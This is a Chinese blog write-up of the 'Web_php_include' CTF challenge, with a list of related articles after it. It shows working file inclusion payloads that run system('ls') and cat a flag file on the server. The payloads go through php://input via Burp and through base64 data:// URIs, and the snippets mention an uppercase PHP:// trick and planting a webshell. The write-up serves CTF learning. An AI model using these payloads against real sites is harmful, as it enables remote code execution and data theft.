攻防世界web高手进阶区 Web_php_include

已于 2022-04-26 16:54:34 修改
阅读量1.9k 收藏 2
点赞数 3
分类专栏: 网络安全 文章标签: 安全
于 2022-04-25 16:04:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61835841/article/details/124404644
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

工具

火狐,burpsuite

分析

代码审计:

strstr():区分大小写

str_replace:替换函数

补充:

 函数原型:mixed str_replace ( mixed $search , mixed $replace , mixed $subject [, int &$count ] )参数说明:$search要被搜索替换的字符串,$replace要替换搜索的字符串,$subject操作的字符串,&$count替换次数,访函数返回在$subject搜索$search替换为$replace的字符串或数组。在这串代码中,将php://替换为"",操作的字符串为$page

方法一:运用php://input

原因:php://input 是个可以访问请求的原始数据的只读流,想要深入了解推荐这篇博客

因为这个可以访问原始数据所以我们用burpsuite抓取它的包,修改命令,达到我们的目的

访问PHP://input

 开始抓包

抓到这个包即可进行查询,输入<?php system('ls');?> ,这是php代码,ls是linux命令

 查询到了文件名字

输入<?php system('cat fl4gisisish3r3.php');?>,cat命令详细:

  得到flag:$flag="ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}";

 方法二:data伪协议

data 协议

php5.2.0 起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是 PHP 代码,就会执行代码使用方法:data://text/plain;base64,xxxx(base64 编码后的数据)data 伪协议只有在 php<5.3 且 include=on 时可以写木马。

即构造data://text/plain;base64,<?php system("ls")?>(base64加密后的值)注意这里ls用双引号

即       data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=

 得到名字继续加密,注意名字后面多的要删除

data://text/plain;base64,<?php system("cat fl4gisisish3r3.php")?>

加密后的data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==

 发现页面里没有,打开源代码,这里应该被隐藏了,得到flag

参考连接;

str_replace函数详解_wangchaoqi1985的博客-CSDN博客_str_replace

攻防世界-web高手进阶区_ZJL_19的博客-CSDN博客_攻防世界web高手进阶

Ant200
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3593
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
攻防世界 web高手进阶 10分题 biscuiti-300
闵行小鱼塘
11-07 1032
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是biscuiti-300的writeup
攻防世界-web Web_php_include
m0_48108919的博客
02-10 1298
根据题目这题应该要用到php文件包含 分析代码: strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是分大小写的) //例如: echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法:替换字符串中的一些字符(分大小写) //例如: echo str_replace("world","Peter","Hello world!"); //输出Hell
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 469
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。分大小写,stristr()函数不分大小写。 string:必需。规定.
攻防世界Web_PHP_Include
Mrs_H的博客
10-04 603
攻防世界Web_PHP_Include 这是一道来自攻防世界web高手进阶题的其中一道题,题目很水,但是身为小白的我也遭遇到了各种各样的问题。所以写一下这道题我所用的wp思路,还有对于其他思路的一些看法。 法一 首先,我们先拿到了这道题的在线场景,打开一看 再结合着题目的意思这是一道文件包含题同时他过滤掉了php://伪协议,我第一反应就是换一个伪协议,将php://换成data://text/plain; 于是构造一个payload:?page=data://text/plain,<?%20sy
php一些函数
m0_54015794的博客
01-15 263
1.show_source()函数是PHP中的内置函数,用于返回突出显示PHP语法的文件。通过使用HTML标记突出显示语法 2.这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些du别zhi。这个符号的bai意思是:变量 PHP采用的是C语言的bai语法,但是也有一些du别zhi。这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些du别zhi。符号加上字符dao串,这就是来一个变量源名或对象名。 MyClass是个类名,不用加符号。符号。符号。_va
攻防世界 web高手进阶 7分题 Web_php_wrong_nginx_config
闵行小鱼塘
08-04 1965
继续ctf的旅程,攻防世界web高手进阶的7分题,本文是Web_php_wrong_nginx_config的writeup
攻防世界 web高手进阶 7分题 comment
闵行小鱼塘
08-11 730
继续ctf的旅程,攻防世界web高手进阶的7分题,本文是comment的writeup
攻防世界 web高手进阶 4分题(fakebook、ics-04、ics-05、FlatScience)
闵行小鱼塘
07-16 591
继续ctf的旅程,攻防世界web高手进阶的4分题:fakebook、ics-04、ics-05、FlatScience
攻防世界 web高手进阶 6分题(ics-07、unfinish、i-got-id-200)
闵行小鱼塘
08-02 848
继续ctf的旅程,攻防世界web高手进阶的6分题:ics-07、unfinish、i-got-id-200
攻防世界web进阶Web_php_include
gongjingege的博客
07-17 637
打开链接,代码审计
攻防世界Web高手进阶
xuhc25的博客
05-07 480
攻防世界Web高手进阶 文章目录1、aNNaNNaNNaN-Batman 1、aNNaNNaNNaN-Batman 题目: 下载下来得到附件,解压。 用txt打开 发现是一个JavaScript脚本。 看着有些乱码,试看看弹窗内容,把末尾的eval改成alert,然后后缀改为html。 双击浏览器打开,就能看到弹出内容。 这回看到是正经的代码了,整理得到如下代码。 function $(){ var e=document.getElementByld("c").value; if(e.
攻防世界Web_php_include
2202_75317918的博客
04-13 856
攻防世界Web_php_include
攻防世界web_php_include
qq_60905276的博客
11-12 271
看到题目分析一波什么意思,首先前面Get hello这个参数没用。 要get page这个参数,然后循环匹配php://,接着把“php://”转换为“ ”。 有两种方法。 第一:大写绕过 因为我查到strstr()这个函数是分大小写的,大写PHP://就可以绕过再用input输入要执行的命令就行了。 page=PHP://input 这个命令可以再url上直接输入,也可以在抓包后输入。 先查看文件目录 <php? system("ls");?> 发现文件,再显示文件...
攻防世界Web_php_include
qq_44111753的博客
11-16 197
WP 攻防世界 Web_php_include 题目 WP 很明显,这题目和文件包含漏洞有关,来分析代码吧 <?php show_source(__FILE__); echo $_GET['hello'];//将hello参数的值输出 $page=$_GET['page'];//get参数提交的page值赋给page while (strstr($page, "php://")) {//若"php://"在page中出现过 $page=str_replace("php://", "", $p
攻防世界-web-Web_php_include
最新发布
wuh2333的博客
05-18 208
攻防世界php_web_include
攻防世界—— Web_php_include
weixin_45960266的博客
02-18 254
攻防世界—— Web_php_include 题目 解题 先读一下代码 1、获取一个hello 没啥用,后面也没有用到 2、page被包含了,这里page由地址栏动态获取 3、strstr函数,用于检验一个字符串是否出现过 4、str_place 字符串的替换 首先,查看源代码,没什么东西 因为是显而易见的文件包含,所以用filter全部转换看一下(这一步其实错了,因为已经可以看到源代码了,所以这一步没用且多余) 我还去解码了一下,啥用也没 又用input执行了命令 这里可以得到 all
攻防世界Web_php_include详解
weixin_63810302的博客
06-21 4656
ctf学习记录
ctf-攻防世界-webWeb_php_include
一只菜鸟的博客
11-21 5853
先看题目标题,php_include,猜测为文件包含漏洞。 打开环境,看到这样一段代码:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值